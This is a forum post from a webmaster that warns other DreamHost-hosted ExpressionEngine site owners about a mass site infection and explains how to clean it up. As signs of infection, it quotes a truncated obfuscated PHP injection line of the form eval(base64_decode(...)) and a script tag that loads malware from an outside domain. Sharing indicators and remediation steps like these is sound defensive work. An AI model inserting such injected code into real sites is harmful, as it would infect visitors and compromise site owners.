I’m not sure if this has been brought up before but I thought i’d give you all a warning.
As i’m sure you are aware, dreamhost was hacked late January, as a result of this 20 of our websites hosted on their shared hosting servers where hacked. I’ve spotted the cause and fixed the hack but it’s proving to be a big job. I’d recommend anyone who is hosting with dreamhost to first check their index.php and admin.php files, if this code is on the first line:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlz….....Then you may have been hacked, another way to check is to view the source of your home page, if you have this just before the closing body tag:
script src="http://sweepstakesandcontestsdo.com/nl.php?p=d"Then you have been hacked. This hack adds a script to your pages for malware, it adds this base64_decode to ALL of your php pages, I found the only way to remove this is to manually do so.
1. First thing’s first is to back up all of your files.
2. Follow the instructions for updating and installing a fresh copy of your EE build. (http://ellislab.com/expressionengine/user-guide/installation/update.html)
3. OK, now you’ve done a fresh install, all of your files should be clean, except the ones you need to replace from your back-up, these are usually:
index.php
admin.php
third_party plug-in php files
third_party theme plug-in php files
4. Manually go into all of your old php files and remove the first line, replace this simply with
<?php.
5. Another place to look would be your template files, this hack usually adds a “files.php” file into the templates, delete this file completely.
Hope this helps. This worked for me and all looks good, I have to do this 20 more times now…